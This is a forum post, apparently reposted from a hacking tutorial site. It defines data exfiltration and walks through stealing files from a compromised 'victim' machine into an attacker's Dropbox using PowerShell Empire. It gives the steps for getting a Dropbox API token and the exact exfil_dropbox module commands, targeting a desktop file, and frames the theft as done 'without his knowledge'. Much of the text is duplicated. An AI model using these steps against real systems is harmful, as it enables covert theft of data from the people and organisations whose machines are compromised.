- 25 Nis 2020
- 19
- 0
What is Data Exfiltration
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.
Methods of Data Exfiltration
Generate Token Via Dropbox API
In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the Dropbox API. Then in the type of access section, we will choose App folder. Name the app as per choice. Then click on Create App Button to proceed.
This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and generate access token. This will give the Dropbox API required for this particular practical; now copy the generated token.
Data Exfiltration
Now we are going to use Powershell empire for exfiltration, considering we have already compromised the victim machine and we are about to complete our mission by copying data from inside the victim without his knowledge.
As you can observe we have Empire-agent which means I have already spawned shell of victims machine and Empire has post exploit for data exfiltration where we will use the above token.
As you can observe that I have notes.txt inside /my files which means we have successfully transferred the data from a source ******** to destination.
Thus, in this way, we have successfully transferred the data from the victims machine to our dropbox and hence this technique is known as dropbox exfiltration.
Data exfiltration occurs when malware and/or a malicious actor carries out an unauthorized data transfer from a computer. It is also commonly called data extrusion or data exportation. Data exfiltration is also considered a form of data theft. During the past couple of decades, a number of data exfiltration efforts severely damaged the consumer confidence, corporate valuation, and intellectual property of businesses and national security of governments across the world.
Methods of Data Exfiltration
Open Methods:
Concealed Methods:
(From Wikipedia)
- HTTP/HTTPS Downloads & Uploads
- FTP
- Instant Messaging
- P2P filesharing
Concealed Methods:
- SSH
- VPN
- Protocol Tunneling
- Cloud Storage Uploads
- Steganography
- Timing channel
(From Wikipedia)
Generate Token Via Dropbox API
In order to do that, this tool requires a Dropbox API. To get that, first, create an account on Dropbox. Then after creating the account, head to developer tools here. A webpage will open similar to the one shown below. Here we will select the Dropbox API. Then in the type of access section, we will choose App folder. Name the app as per choice. Then click on Create App Button to proceed.
This will lead to another webpage as shown below. Here, move on to the O Auth 2 Section, and generate access token. This will give the Dropbox API required for this particular practical; now copy the generated token.
Data Exfiltration
Now we are going to use Powershell empire for exfiltration, considering we have already compromised the victim machine and we are about to complete our mission by copying data from inside the victim without his knowledge.
As you can observe we have Empire-agent which means I have already spawned shell of victims machine and Empire has post exploit for data exfiltration where we will use the above token.
Kod:
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey <API Token>
executeAs you can observe that I have notes.txt inside /my files which means we have successfully transferred the data from a source ******** to destination.
Thus, in this way, we have successfully transferred the data from the victims machine to our dropbox and hence this technique is known as dropbox exfiltration.
source:https://www.hackingarticles.in/data-exfiltration-using-powershell-empire/
Son düzenleme:
